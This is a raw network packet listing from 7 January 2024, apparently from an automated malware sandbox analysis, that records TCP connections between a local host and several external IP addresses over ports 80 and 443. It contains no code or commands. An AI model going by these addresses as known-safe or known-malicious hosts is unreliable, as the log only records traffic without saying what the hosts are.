                                                                                                                                                                    Jan 7, 2024 05:30:07.088496923 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:07.088561058 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:07.088608980 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:07.092678070 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:07.092730999 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:07.092843056 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:07.092870951 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:07.191826105 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:07.191888094 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:07.194520950 CET4977180192.168.2.491.104.83.7
                                                                                                                                                                    Jan 7, 2024 05:30:07.315685987 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:30:07.315748930 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:30:07.401973963 CET804977191.104.83.7192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:07.510998964 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:07.527610064 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:07.595432043 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:30:07.595534086 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:30:07.772475004 CET44349772172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:07.772969961 CET44349772172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:07.773021936 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:07.789201975 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:07.807806015 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:07.821757078 CET49772443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:30:07.821791887 CET44349772172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:07.872350931 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:30:07.995277882 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.084851027 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.084923983 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.085190058 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.177051067 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.382399082 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.382443905 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.382489920 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.382538080 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.382596970 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.382642031 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.382704020 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.382774115 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.382812023 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.382837057 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.382908106 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.382992983 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.383018017 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.501636028 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.501678944 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.501692057 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.501691103 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.501751900 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.501760006 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.501833916 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.501877069 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.501912117 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.501977921 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.501992941 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.502037048 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.502063036 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.502104998 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.502882004 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.502985954 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.503034115 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.503057957 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.503149033 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.503194094 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.503216028 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.503746033 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.503868103 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.504149914 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.504196882 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.504245043 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.504339933 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.504390001 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.504426956 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.504484892 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.504565001 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.504601955 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.504606962 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.559338093 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.559360027 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.559372902 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.559386015 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.559427023 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.559441090 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.559463024 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.559490919 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.559674025 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.559715986 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.559776068 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.559926987 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.560015917 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.560064077 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.560090065 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.589468956 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.589528084 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.589536905 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.646620989 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.646678925 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.646678925 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.646805048 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.646852970 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.646873951 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.646985054 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.647028923 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.647036076 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.647129059 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.647183895 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.647222996 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.647247076 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.647274017 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.647298098 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.647372007 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.647414923 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.647444963 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.647528887 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.647572041 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.647656918 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.647802114 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.647850037 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.648061037 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.734060049 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.734113932 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.734230995 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.734323978 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.734370947 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.734417915 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.734589100 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.734626055 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.734635115 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.734776974 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.734814882 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.734848022 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.735069990 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.735095024 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.735112906 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.735115051 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.735163927 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.735165119 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.735209942 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.735256910 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.735337973 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.735423088 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.735508919 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.735548019 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.735595942 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.735634089 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.735714912 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.817101955 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.817157984 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.817169905 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.817281961 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.817333937 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.823187113 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.823287964 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.823343992 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.823364973 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.823451996 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.823503017 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.823503017 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.823601961 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.823638916 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.823684931 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.823762894 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.823893070 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.823896885 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.824052095 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.824124098 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.824237108 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.824377060 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.824429989 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.824474096 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.872348070 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.911623955 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.911709070 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.911753893 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.911879063 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.911971092 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.912015915 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.912044048 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.912151098 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.912278891 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.912323952 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.912455082 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.912534952 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.912602901 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.913063049 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.913108110 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.913140059 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.913423061 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.913492918 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.913506985 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.913592100 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.913652897 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.913688898 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.913705111 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.913742065 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.913775921 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.913793087 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.913836956 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.993956089 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.993983030 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.994040966 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.998766899 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.998831987 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.998903036 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.998930931 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.999073982 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.999109983 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.999147892 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.999191999 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.999241114 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.999269962 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.999454975 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.999494076 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.999572039 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.999691010 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.999735117 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.999748945 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.999794006 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.999881983 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.999921083 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:08.999944925 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:08.999982119 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.000071049 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.000128984 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.000169039 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.000217915 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.000319004 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.000355005 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.082587004 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.082643986 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.082665920 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.082715034 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.082751036 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.082804918 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.082833052 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.086747885 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.086803913 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.086812019 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.086862087 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.086955070 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.086983919 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.087110996 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.087219000 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.087254047 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.087958097 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.087975025 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.088005066 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.088079929 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.088129044 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.088175058 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.088310957 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.088351965 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.088408947 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.088567972 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.088608980 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.088675976 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.088712931 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.088737965 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.088762999 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.088768005 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.088805914 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.173804045 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.173888922 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.173927069 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.173937082 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.174101114 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.174137115 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.174174070 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.174253941 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.174297094 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.174438953 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.174729109 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.174772024 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.174949884 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.175273895 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.175324917 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.175487041 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.175558090 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.175595045 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.175643921 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.175823927 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.175846100 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.175863981 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.175968885 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.176003933 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.176091909 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.176208019 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.176254988 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.176290035 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.176312923 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.176348925 CET4977580192.168.2.4104.21.26.173
                                                                                                                                                                    Jan 7, 2024 05:30:09.259130955 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.259469986 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.259530067 CET8049775104.21.26.173192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:30:09.259574890 CET4977580192.168.2.4104.21.26.173
